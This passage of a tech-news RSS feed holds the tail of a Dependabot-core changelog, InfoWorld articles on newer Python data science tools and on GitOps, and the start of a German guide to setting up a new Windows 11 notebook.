<li>Bump library/golang from 1.26.1-bookworm to 1.26.5-bookworm in /go_modules by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4867732850" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15562" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15562/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15562">#15562</a></li>
<li>Fix npm security updates for transitive dependencies in workspace monorepos by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Swampen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Swampen">@Swampen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4826508534" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15514" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15514/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15514">#15514</a></li>
<li>Add helm to the smoke-test matrix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/casey-robertson-paypal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/casey-robertson-paypal">@casey-robertson-paypal</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4857335602" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15554" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15554/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15554">#15554</a></li>
<li>v0.386.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4869767530" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15564" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15564/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15564">#15564</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/telnet23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/telnet23">@telnet23</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4862784915" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15557" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15557/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15557">#15557</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Swampen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Swampen">@Swampen</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4826508534" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15514" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15514/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15514">#15514</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.385.0...v0.386.0"><tt>v0.385.0...v0.386.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[7 newer data science tools you should be using with Python]]></title>
<description><![CDATA[Python’s rich ecosystem of data science tools is a big draw for users. The only downside of such a broad and deep collection is that sometimes the best tools can get overlooked.



Here’s a rundown of some of the best newer or less-known data science projects available for Python. Some, like Pola...]]></description>
<link>https://tsecurity.de/de/3665680/ai-nachrichten/7-newer-data-science-tools-you-should-be-using-with-python/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665680/ai-nachrichten/7-newer-data-science-tools-you-should-be-using-with-python/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:47 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Python’s rich ecosystem of data science tools is a big draw for users. The only downside of such a broad and deep collection is that sometimes the best tools can get overlooked.</p>



<p class="wp-block-paragraph">Here’s a rundown of some of the best newer or less-known data science projects available for <a href="https://www.infoworld.com/article/2254260/how-to-get-started-with-python.html">Python</a>. Some, like Polars, are getting more attention but still deserve wider notice. Others, like ConnectorX, are hidden gems.</p>



<h2 class="wp-block-heading">ConnectorX</h2>



<p class="wp-block-paragraph">Most data sits in a database somewhere, but computation typically happens outside of it. Getting data to and from the database for actual work can be a slowdown. <a href="https://github.com/sfu-db/connector-x">ConnectorX</a> loads data from databases into many common data-wrangling tools in Python, and it keeps things fast by minimizing the work required. Most of the data loading can be done in just a couple of lines of Python code and <a href="https://www.infoworld.com/article/2255395/what-is-sql-the-lingua-franca-of-data-analysis.html">an SQL query</a>.</p>



<p class="wp-block-paragraph">Like Polars (which I’ll discuss shortly), ConnectorX uses a <a href="https://www.infoworld.com/article/2258463/rust-tutorial-get-started-with-the-rust-language.html">Rust</a> library at its core. This allows for optimizations like being able to load from a data source in parallel with partitioning. Data in <a href="https://www.infoworld.com/article/3489168/postgresql-tutorial-get-started-with-postgresql-16.html">PostgreSQL</a>, for instance, can be loaded this way by specifying a partition column.</p>



<p class="wp-block-paragraph">Aside from PostgreSQL, ConnectorX also supports reading from MySQL/MariaDB, SQLite, Amazon Redshift, Microsoft SQL Server and Azure SQL, and Oracle. The results can be funneled into a <a href="https://www.infoworld.com/article/2264264/how-to-use-pandas-for-data-analysis-in-python.html">Pandas</a> or PyArrow DataFrame, or into Modin or Dask (via Pandas), or Polars (via PyArrow). General support for reading from ODBC is a work in progress.</p>



<h2 class="wp-block-heading">DuckDB</h2>



<p class="wp-block-paragraph">Data science folks who use Python ought to be aware of <a href="https://www.infoworld.com/article/2337363/why-you-should-use-sqlite-3.html">SQLite</a>—a small, but powerful and speedy relational database packaged with Python. Since it runs as an in-process library, rather than a separate application, SQLite is lightweight and responsive.</p>



<p class="wp-block-paragraph"><a href="https://duckdb.org/">DuckDB</a> is a little like someone answered the question, “<a href="https://www.infoworld.com/article/2336981/duckdb-the-tiny-but-powerful-analytics-database.html">What if we made SQLite for OLAP?</a>” Like other <a href="https://www.infoworld.com/article/2334471/what-is-olap-analytical-databases.html">OLAP</a> database engines, it uses a columnar datastore and is optimized for long-running analytical query workloads. But DuckDB gives you all the things you expect from a conventional database, like ACID transactions. And there’s no separate software suite to configure; you can get it running in a Python environment with a single <code>pip install duckdb</code> command.</p>



<p class="wp-block-paragraph">DuckDB can directly ingest data in CSV, <a href="https://www.infoworld.com/article/2255837/what-is-json-a-better-format-for-data-exchange.html">JSON</a>, or <a href="https://www.infoworld.com/article/2336762/exploring-the-apache-ecosystem-for-data-analysis.html">Parquet</a> format, as well as <a href="https://duckdb.org/docs/stable/data/data_sources">a slew of other common data sources</a>. The resulting databases can also be partitioned into multiple physical files for efficiency, based on keys (e.g., by year and month). Querying works like any other <a href="https://www.infoworld.com/article/2255395/what-is-sql-the-lingua-franca-of-data-analysis.html">SQL</a>-powered relational database, but with additional built-in features like the ability to take random samples of data or construct window functions.</p>



<p class="wp-block-paragraph">DuckDB also has a small but useful collection of extensions, including full-text search, <a href="https://duckdb.org/docs/stable/core_extensions/vss">accelerated vector similarity search</a>, Excel import/export, direct connections to SQLite and PostgreSQL, Parquet file export, and support for many common geospatial data formats and types.</p>



<h2 class="wp-block-heading">Optimus</h2>



<p class="wp-block-paragraph">One of the least enviable jobs you can be stuck with is cleaning and preparing data for use in a DataFrame-centric project. <a href="https://github.com/hi-primus/optimus">Optimus</a> is an all-in-one tool set for loading, exploring, cleansing, and writing data back out to a variety of data sources.</p>



<p class="wp-block-paragraph">Optimus can use <a href="https://www.infoworld.com/article/2264264/how-to-use-pandas-for-data-analysis-in-python.html">Pandas</a>, Dask, CUDF (and Dask + CUDF), Vaex, or <a href="https://www.infoworld.com/article/2259224/what-is-apache-spark-the-big-data-platform-that-crushed-hadoop.html">Spark</a> as its underlying data engine. Data can be loaded in from and saved back out to Arrow, Parquet, Excel, a variety of common database sources, or flat-file formats like CSV and JSON.</p>



<p class="wp-block-paragraph">The data manipulation API resembles Pandas, but adds <code>.rows()</code> and <code>.cols()</code> accessors to make it easy to do things like sort a DataFrame, filter by column values, alter data according to criteria, or narrow the range of operations based on some criteria. Optimus also comes bundled with processors for handling common real-world data types like email addresses and URLs.</p>



<p class="wp-block-paragraph">One possible issue with Optimus is that it’s still under active development but its last official release was in 2020. This means it might not be as current as other components in your stack.</p>



<h2 class="wp-block-heading">Polars</h2>



<p class="wp-block-paragraph">If you spend much time working with DataFrames and you’re frustrated by the performance limits of <a href="https://www.infoworld.com/article/2264264/how-to-use-pandas-for-data-analysis-in-python.html">Pandas</a>, reach for <a href="https://github.com/pola-rs/polars">Polars</a>. This DataFrame library for Python offers a convenient syntax similar to Pandas.</p>



<p class="wp-block-paragraph">Unlike Pandas, though, Polars uses a library written in <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">Rust</a> that takes maximum advantage of your hardware out of the box. You don’t need to use special syntax to take advantage of performance-enhancing features like parallel processing or SIMD; it’s all automatic. Even simple operations like reading from a CSV file are faster. Rust developers can <a href="https://github.com/pola-rs/pyo3-polars">craft their own Polars extensions using pyo3</a>.</p>



<p class="wp-block-paragraph">Polars provides eager and lazy execution modes, so queries can be executed immediately or deferred until needed. It also provides a streaming API for processing queries incrementally. Streaming isn’t available yet for many functions, although Polars can always fall back to the in-memory engine for such operations if need be. You can also <a href="https://docs.pola.rs/api/python/stable/reference/lazyframe/api/polars.LazyFrame.show_graph.html">plot execution graphs for queries</a>, streaming or otherwise, if you want to get an idea of what memory or CPU consumption is like for the query (via the external Graphviz library).</p>



<h2 class="wp-block-heading">DVC</h2>



<p class="wp-block-paragraph">A major and pervasive issue with data science experiments is <a href="https://www.infoworld.com/article/2260350/version-control-track-the-who-what-and-when-of-software-changes.html">version control</a>—not of the project’s code, but its data. <a href="https://github.com/iterative/dvc">DVC</a>, short for Data Version Control, lets you attach version descriptors to datasets, check them into Git as you would the rest of your code, and keep versions of data and code consistent together.</p>



<p class="wp-block-paragraph">DVC can track most any kind of dataset as long as they can be expressed as a file, whether kept in local storage or in a <a href="https://dvc.org/doc/user-guide/data-management/remote-storage#supported-storage-types">remote storage service</a> like an Amazon S3 bucket. You can describe how data models are managed and used by way of a “<a href="https://dvc.org/doc/user-guide/data-management/remote-storage#supported-storage-types">pipeline</a>,” which DVC’s documentation describes as being like “a Makefile system for machine learning projects.”</p>



<p class="wp-block-paragraph">The use cases for DVC are intended to be more than just allowing data to be versioned alongside code. It also works as a fast data cache for remotely hosted data, a methodology for tracking experiments conducted with data, and a registry or catalog for <a href="https://www.infoworld.com/article/2254843/what-is-machine-learning-intelligence-derived-from-data.html">machine learning models</a> created with the data. <a href="https://www.infoworld.com/article/2254808/get-started-with-visual-studio-code.html">Visual Studio Code</a> users can integrate DVC workflows into the editor by way of the <a href="https://marketplace.visualstudio.com/items?itemName=Iterative.dvc">DVC VS Code extension</a>.</p>



<h2 class="wp-block-heading">Cleanlab</h2>



<p class="wp-block-paragraph">Good machine learning datasets are hard to come by, because it’s expensive and time-consuming to create clean, properly labeled data. Sometimes, though, you have no choice but to use data that’s raw and inconsistent. <a href="https://github.com/cleanlab/cleanlab">Cleanlab</a> (as in, “cleans labels”) was made for this scenario.</p>



<p class="wp-block-paragraph">Cleanlab uses existing, high-quality machine learning datasets to analyze lower-quality, unlabeled (or poorly labeled) datasets. You create a model based on the original dataset, use Cleanlab to figure out what needs to be improved in the original dataset, then re-train using your automatically cleaned and adjusted dataset to see the difference.</p>



<p class="wp-block-paragraph">Cleanlab is data-model and data-framework agnostic, a powerful aspect of its design. It doesn’t matter if you’re running <a href="https://www.infoworld.com/article/2335194/what-is-pytorch-python-machine-learning-on-gpus.html">PyTorch</a>, OpenAI, scikit-learn, or <a href="https://www.infoworld.com/article/2255099/what-is-tensorflow-the-machine-learning-library-explained.html">Tensorflow</a>; Cleanlab can work with any classifier. It does, however, have specific workflows for common tasks like token classification, multi-labeling, regression, image segmentation and object detection, outlier detection, and so on. It’s worth perusing the <a href="https://github.com/cleanlab/examples">example set</a> to see for yourself how the process works and what results you can expect.</p>



<h2 class="wp-block-heading">Snakemake</h2>



<p class="wp-block-paragraph">Data science workflows are hard to set up, and that’s even harder to do in a consistent, predictable way. <a href="https://github.com/snakemake/snakemake">Snakemake</a> was created to automate the process, setting up data analysis workflows in ways that ensure everyone gets the same results. Many existing data science projects rely on Snakemake. The more moving parts you have in your data science workflow, the more likely you’ll benefit from automating that workflow with Snakemake.</p>



<p class="wp-block-paragraph">Snakemake workflows resemble GNU Make workflows—you define the steps of the workflow with rules, which specify what they take in, what they put out, and what commands to execute to accomplish that. Workflow rules can be multithreaded (assuming that gives them any benefit), and configuration data can be piped in from <a href="https://www.infoworld.com/article/2255837/what-is-json-a-better-format-for-data-exchange.html">JSON</a> or <a href="https://www.infoworld.com/article/2336307/7-yaml-gotchas-to-avoidand-how-to-avoid-them.html">YAML</a> files. You can also define functions in your workflows to transform data used in rules, and write the actions taken at each step to logs.</p>



<p class="wp-block-paragraph">Snakemake jobs are designed to be portable—they can be deployed on any <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes-managed environment</a>, or in specific cloud environments like Google Cloud Life Sciences or Tibanna on AWS. Workflows can be “frozen” to use a specific set of packages, and successfully executed workflows can have unit tests automatically generated and stored with them. And for long-term archiving, you can store the workflow as a tarball.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is GitOps? Extending devops to Kubernetes and beyond]]></title>
<description><![CDATA[Over the past decade, software development has been shaped by two closely related transformations. One is the rise of devops and continuous integration and continuous delivery (CI/CD), which brought development and operations teams together around automated, incremental software delivery.



The ...]]></description>
<link>https://tsecurity.de/de/3665667/ai-nachrichten/what-is-gitops-extending-devops-to-kubernetes-and-beyond/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665667/ai-nachrichten/what-is-gitops-extending-devops-to-kubernetes-and-beyond/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:29 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over the past decade, software development has been shaped by two closely related transformations. One is the rise of <a href="https://www.infoworld.com/article/2255028/what-is-devops-bringing-dev-and-ops-together-for-better-software.html">devops</a> and <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">continuous integration and continuous delivery</a> (CI/CD), which brought development and operations teams together around automated, incremental software delivery.</p>



<p class="wp-block-paragraph">The other is the shift from monolithic applications to distributed, cloud-native systems built from microservices and containers, typically managed by orchestration platforms such as <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a>.</p>



<p class="wp-block-paragraph">While Kubernetes and similar platforms simplify many aspects of running distributed applications, operating these systems at scale is still complicated. Configuration sprawl, environment drift, and the need for rapid, reliable change all introduce operational challenges. GitOps emerged as a way to address those challenges by extending familiar devops and CI/CD techniques beyond application code and into infrastructure and system configuration.</p>



<p class="wp-block-paragraph">At the heart of GitOps is the concept of <a href="https://www.infoworld.com/article/2259359/what-is-infrastructure-as-code-automating-your-infrastructure-builds.html">infrastructure as code</a> (IaC). In a GitOps model, not only application code but also infrastructure definitions, deployment configurations, and operational settings are described in files stored in a version control system. Automated processes continuously compare the running system with those declarations and work to bring the live environment back into alignment when differences appear.</p>



<p class="wp-block-paragraph">In this approach, the version control repository serves as the system of record for how applications and their supporting infrastructure should look in production. Changes flow through the same review, approval, and automation pipelines that developers already use for software, bringing greater consistency, traceability, and repeatability to cloud-native operations.</p>



<p class="wp-block-paragraph">At a high level, GitOps refers to a set of operational practices for managing cloud-native systems using declarative configuration, version control, and automated reconciliation. Rather than treating infrastructure and application configuration as mutable runtime state, GitOps treats them as versioned artifacts that move through the same review, testing, and deployment processes as application code.</p>



<h2 class="wp-block-heading"><strong>GitOps defined</strong></h2>



<p class="wp-block-paragraph">The term GitOps was originally coined and popularized by Weaveworks, which helped formalize the approach in the context of Kubernetes operations. While that early work shaped the way GitOps was discussed and implemented, GitOps has since evolved into a broadly adopted, vendor-neutral pattern. Today, it describes a shared set of ideas rather than a specific product or platform.</p>



<p class="wp-block-paragraph">The defining characteristic of GitOps is its reliance on declarative configuration stored in a version control system. Instead of issuing imperative commands to change live systems, teams describe the desired state of applications and infrastructure in configuration files. Automated agents then continuously compare that declared state with what is actually running and work to reconcile any differences. This pull-based model—where systems converge toward the desired state defined in version control—provides built-in drift detection, repeatability, and a clear audit trail for every change.</p>



<p class="wp-block-paragraph">Because GitOps centers on configuration files stored in a version control system, familiar software development practices carry over naturally. Changes are proposed through commits, reviewed before being accepted, and tracked over time. Rollbacks are accomplished by reverting to known-good versions, and the history of how a system evolved is preserved alongside the configuration itself.</p>



<p class="wp-block-paragraph">While the use of <a href="https://www.infoworld.com/article/2334697/what-is-git-version-control-for-collaborative-programming.html">Git</a> as the version control system is not strictly required, it has become the default choice because of its ubiquity in modern devops workflows and its strong support for collaboration and change management, so its place in the name has stuck.</p>



<aside class="sidebar">
<h3><strong> GitOps vs. IaC </strong></h3>
<p>Infrastructure as code (IaC) and GitOps are closely related, but they solve different problems. </p>
<p>IaC focuses on how infrastructure is defined. Servers, networks, and services are described using declarative configuration files, which are then applied by automation tools. GitOps builds on IaC by adding an operating model around those definitions. In a GitOps workflow, the desired state of systems is stored in a version control repository and treated as the system of record. Automated agents continuously compare the running environment with that desired state and reconcile any differences.</p>
<p>The key distinction is persistence. IaC provisions infrastructure; GitOps keeps systems in the intended state over time. By using pull-based reconciliation and continuous drift detection, GitOps extends IaC into a day-to-day operational discipline.
</p>

</aside>



<h2 class="wp-block-heading"><strong>What is the CI/CD process?</strong></h2>



<p class="wp-block-paragraph">A complete look at CI/CD is beyond the scope of this article—<a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">see the InfoWorld explainer on the subject</a>—but we need to say a few words about CI/CD because it’s at the core of how GitOps works. The <em>continuous integration</em> half of CI/CD is enabled by version control repositories like Git: Developers can make constant small improvements to their codebase, rather than rolling out huge, monolithic new versions every few months or years. The <em>continuous deployment</em> piece is made possible by automated systems called <em>pipelines</em> that build, test, and deploy the new code to production.</p>



<p class="wp-block-paragraph">Again, we keep talking about <em>code </em>here, and that usually summons up visions of executable code written in a programming language such as C or Java or JavaScript. But in GitOps, the “code” we’re managing is largely made up of configuration files. This isn’t just a minor detail — it’s at the heart of what GitOps does. These config files are, as we’ve said, the “single source of truth” describing what our system should look like. They are <em>declarative </em>rather than instructive. That means that instead of saying “start up ten servers,” the configuration file will simply say, “this system includes ten servers.”</p>



<p class="wp-block-paragraph"><strong>GitOps and Kubernetes</strong></p>



<p class="wp-block-paragraph">GitOps first took hold in the Kubernetes ecosystem, where declarative configuration and continuous reconciliation are core design principles. As a result, Kubernetes remains the most common and best-understood environment for applying GitOps practices. A typical GitOps-driven update process for a Kubernetes application looks like this:</p>



<ol start="1" class="wp-block-list">
<li>A developer proposes a change by committing updated application code or configuration to a version control repository, usually through a pull request.</li>



<li>That change is reviewed and approved, then merged into the main branch.</li>



<li>The merge triggers an automated CI/CD pipeline that tests the change, builds new artifacts if needed, and publishes them to a registry.</li>



<li>A GitOps controller or similar automated agent detects the updated desired state stored in version control.</li>



<li>The controller compares that desired state with the current state of the Kubernetes cluster and applies the necessary changes to bring the cluster back into alignment.</li>
</ol>



<p class="wp-block-paragraph">This pull-based reconciliation loop—where the cluster continuously converges toward the desired state defined in version control—is central to how GitOps works in practice. While Kubernetes provides a natural fit for this model, it represents just one canonical use case. The same patterns increasingly apply to infrastructure provisioning, policy enforcement, and multi-cluster operations beyond Kubernetes itself.</p>



<h2 class="wp-block-heading"><strong>GitOps tooling in practice: Argo CD, Flux, and the ecosystem</strong></h2>



<p class="wp-block-paragraph">GitOps is enabled by a set of tools that embody the principles we’ve outlined, with some open-source projects emerging as de facto standards in cloud-native environments.</p>



<p class="wp-block-paragraph">At the center of the GitOps ecosystem is Argo CD, an open-source controller that continuously monitors a version control repository and ensures that the state of running systems matches the declared desired state. Argo CD is widely used in Kubernetes environments because it directly implements pull-based reconciliation: it compares the desired state stored in Git with the cluster’s actual state and applies changes to correct any drift.</p>



<p class="wp-block-paragraph">Alongside Argo CD, Flux is another prominent open source GitOps engine. Both Flux and Argo CD help teams adopt GitOps workflows by managing the synchronization loop between code and runtime, but they differ in operational philosophy, integration surfaces, and ecosystem fit.</p>



<p class="wp-block-paragraph">GitOps tooling often appears as part of broader platforms or integrated stacks rather than as isolated utilities. For example, <a href="https://www.infoworld.com/article/4006297/top-6-multicloud-management-systems.html">multicloud and cluster management solutions</a> now routinely include GitOps support, with Argo CD or compatible controllers bundled alongside deployment, policy, and governance capabilities.</p>



<p class="wp-block-paragraph">In addition to Flux and Argo CD, a range of auxiliary tools contribute to a complete GitOps ecosystem: policy as code engines (e.g., Open Policy Agent), drift detection systems, and infrastructure provisioning tools that mesh with Git-centric workflows.</p>



<h2 class="wp-block-heading"><strong>GitOps, devops, and normalization</strong></h2>



<p class="wp-block-paragraph">GitOps grew out of the same forces that drove devops into mainstream IT practice, and in its early days, GitOps was often discussed as a distinct extension of devops, specifically tailored to managing declarative infrastructure and Kubernetes-centric systems. At the time, GitOps was still relatively new and <a href="http://infoworld.com/article/2265546/why-gitops-isnt-ready-for-the-mainstream-yet.html">not yet widely adopted outside cloud-native pioneers</a>.</p>



<p class="wp-block-paragraph">Over the last several years, however, GitOps practices have become deeply woven into how teams operate modern cloud environments. Rather than being treated as an optional add-on or marketing term, the core ideas of GitOps — using version-controlled, declarative configuration and automated reconciliation loops to continuously align running systems with intended state — are now part of standard operational practice in many Kubernetes-centric shops. In this sense, GitOps has shifted from a buzzword about what might be possible to a baseline pattern for cloud-native operations, much like devops itself did years earlier.</p>



<p class="wp-block-paragraph">In environments where Kubernetes and declarative systems are the norm, GitOps workflows are the default way teams manage and deploy change. Many organizations now implement these patterns without explicitly calling them “GitOps,” just as few teams today explicitly say they do “CI/CD” even though continuous pipelines are taken for granted. The term has become less prominent in marketing, but its practices are often embedded in pipelines, controllers, and platform tooling.</p>



<p class="wp-block-paragraph">That normalization shows up in how GitOps workflows are woven into broader operational frameworks. For example, <a href="https://www.infoworld.com/article/2338225/what-is-platform-engineering-evolving-devops.html">platform engineering</a> teams frequently build internal developer platforms that encapsulate GitOps patterns behind standardized developer APIs, making the pattern invisible to most application teams while still providing the auditability and automation that GitOps promises.</p>



<h2 class="wp-block-heading"><strong>GitOps beyond Kubernetes: infrastructure, policy, and drift</strong></h2>



<p class="wp-block-paragraph">While GitOps first gained traction as a way to manage Kubernetes deployments, its core principles apply broadly to infrastructure and operational concerns beyond any single orchestration platform. GitOps treats desired state as declarative configuration stored in version control and uses automated reconciliation to ensure running systems align with that state. That pattern naturally extends to infrastructure provisioning, policy enforcement, configuration drift detection, and governance workflows across diverse environments.</p>



<p class="wp-block-paragraph">In modern operational stacks, infrastructure is increasingly defined declaratively, whether through Kubernetes manifests, Terraform modules, or other infrastructure-as-code formats. Storing these declarations in version control enables the same peer-review, auditability, and rollback practices developers already use for application code. Automated tooling then continuously detects when the live infrastructure diverges from the declared state and works to bring it back into alignment, reducing the risk of configuration drift and inadvertent misconfigurations.</p>



<p class="wp-block-paragraph">Configuration drift — the state where an environment has diverged from what’s declared in version control — remains a major operational headache, especially in complex, dynamic systems. Drift can arise from ad hoc fixes, emergency updates, or manual changes made outside normal pipelines, and it can lead to inconsistencies, outages, and security gaps. By continually checking running systems against the desired state in Git and reconciling deviations automatically, GitOps workflows help teams keep environments predictable and auditable.</p>



<p class="wp-block-paragraph">Policy enforcement and compliance are another natural extension of GitOps patterns. As organizations adopt declarative practices, policy-as-code engines and drift detection systems can be woven into GitOps pipelines to validate that proposed configurations meet security, compliance, or operational standards before they’re ever applied to running systems. Embedding policy checks into declarative workflows brings consistency to governance while preserving the automation and speed that devops teams expect.</p>



<h2 class="wp-block-heading"><strong>GitOps – beyond Kubernetes</strong></h2>



<p class="wp-block-paragraph">GitOps began as a way to bring devops discipline to Kubernetes operations, but its longer-term impact has been more subtle. In many ways, it’s been absorbed into the fabric of modern cloud-native operations, where declarative configuration, version control, and automated reconciliation are taken for granted. Today, GitOps is less about a specific set of tools or a named practice and more about an operational mindset. By treating infrastructure and configuration as versioned, auditable artifacts and relying on automation to enforce consistency, GitOps helps teams manage complexity at scale. Even as the term itself fades from the spotlight, the practices it introduced continue to shape how distributed systems are built, deployed, and operated.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Neues Notebook? Diese 10 Schritte sollten Sie sofort erledigen]]></title>
<description><![CDATA[Ein neues Notebook fühlt sich an wie ein digitaler Neubeginn: schnell, sauber, bereit für alles. Doch bevor Sie mit dem neuen Gerät loslegen, empfehlen wir einen kurzen System-Check. Denn viele Geräte leiden ab Werk an unnötiger Software, suboptimalen Einstellungen und deaktivierten Sicherheitsfu...]]></description>
<link>https://tsecurity.de/de/3665427/windows-tipps/neues-notebook-diese-10-schritte-sollten-sie-sofort-erledigen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665427/windows-tipps/neues-notebook-diese-10-schritte-sollten-sie-sofort-erledigen/</guid>
<pubDate>Mon, 13 Jul 2026 15:41:22 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein neues Notebook fühlt sich an wie ein digitaler Neubeginn: schnell, sauber, bereit für alles. Doch bevor Sie mit dem neuen Gerät loslegen, empfehlen wir einen kurzen System-Check. Denn viele Geräte leiden ab Werk an unnötiger Software, suboptimalen Einstellungen und deaktivierten Sicherheitsfunktionen.</p>



<p>Wir zeigen Ihnen <strong>die 10 wichtigsten Schritte</strong>, die Sie direkt nach dem ersten Einschalten erledigen sollten – damit Ihr Windows-11-Notebook von Anfang an mit voller Leistung und bestmöglichem Schutz läuft.</p>



<h2 class="wp-block-heading">1. Windows einrichten und Updates installieren</h2>



<p>Der erste Start ist vielleicht der wichtigste. Nehmen Sie sich die paar Minuten und richten Sie Windows sorgfältig ein, das kann Ihnen später manchen Ärger ersparen. Nach der Anmeldung (egal ob mit Microsoft- oder lokalem Konto) sollten Sie sofort nach Updates suchen:</p>



<ol start="1" class="wp-block-list">
<li>Öffnen Sie <strong>Einstellungen → Windows Update</strong>.</li>



<li>Klicken Sie auf <strong>„Nach Updates suchen“</strong> und installieren Sie alles, was hier angeboten wird.</li>



<li>Starten Sie den Rechner neu – und wiederholen Sie den Vorgang, bis keine Updates mehr anstehen.</li>
</ol>



<p>Viele neue Notebooks liegen vor dem Verkauf monatelang im Lager. Deswegen fehlen oft wichtige Sicherheits- und Treiber-Updates. Optional können Sie auf der Website Ihres Herstellers (zum Beispiel <a href="https://lenovo.7eer.net/c/230135/217393/3786?u=https://support.lenovo.com/de/de/solutions/ht003029-lenovo-system-update-update-drivers-bios-and-applications&amp;subid1=rss" target="_blank" rel="noreferrer noopener">Lenovo</a>, <a href="https://www.tkqlhce.com/click-1676582-15735591?sid=rss&amp;url=https://www.dell.com/support/home/de-de?app=drivers" target="_blank" rel="noreferrer noopener">Dell</a>, <a href="https://clk.tradedoubler.com/click?p=245747&amp;a=1573066&amp;epi=rss&amp;url=https://support.hp.com/de-de/drivers/laptops" target="_blank" rel="noreferrer noopener">HP</a>, <a href="https://www.asus.com/de/support/download-center/" target="_blank" rel="noreferrer noopener">Asus</a>) zusätzlich nach aktuellen Treibern für Grafik, WLAN oder Chipsatz suchen. Das sorgt für mehr Stabilität und Performance.</p>



<p><strong>Tipp</strong>: Wenn Windows Sie mit Forderungen oder Empfehlungen zum Microsoft-Konto nervt, Sie das aber nicht wollen, dann lesen Sie unseren Ratgeber <a href="https://www.pcwelt.de/article/1513299/windows-ohne-microsoft-konto-nutzen.html" target="_blank" rel="noreferrer noopener">Windows ohne Microsoft-Konto nutzen – so geht’s</a>.</p>



<p><strong>Sie überlegen, ein neues Notebook zu kaufen?</strong> Hier finden Sie unsere <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Laptop-Tests mit Kaufempfehlung für jeden Einsatzzweck</a>. Notebooks für Schüler und Studenten stellen wir <a href="https://www.pcwelt.de/article/1204273/die-besten-laptops-fuer-studenten-und-schueler-im-test.html" target="_blank" rel="noreferrer noopener">in diesem Beitrag vor</a>. Und wenn Sie auf der Suche nach einem Schnäppchen sind, dann lesen Sie hier unsere <a href="https://www.pcwelt.de/article/2771173/test-die-besten-laptops-unter-500-euro-2.html" target="_blank" rel="noreferrer noopener">Tests der besten Laptops unter 500 Euro</a>.</p>



<h2 class="wp-block-heading">2. Unnötige Software finden und deinstallieren</h2>


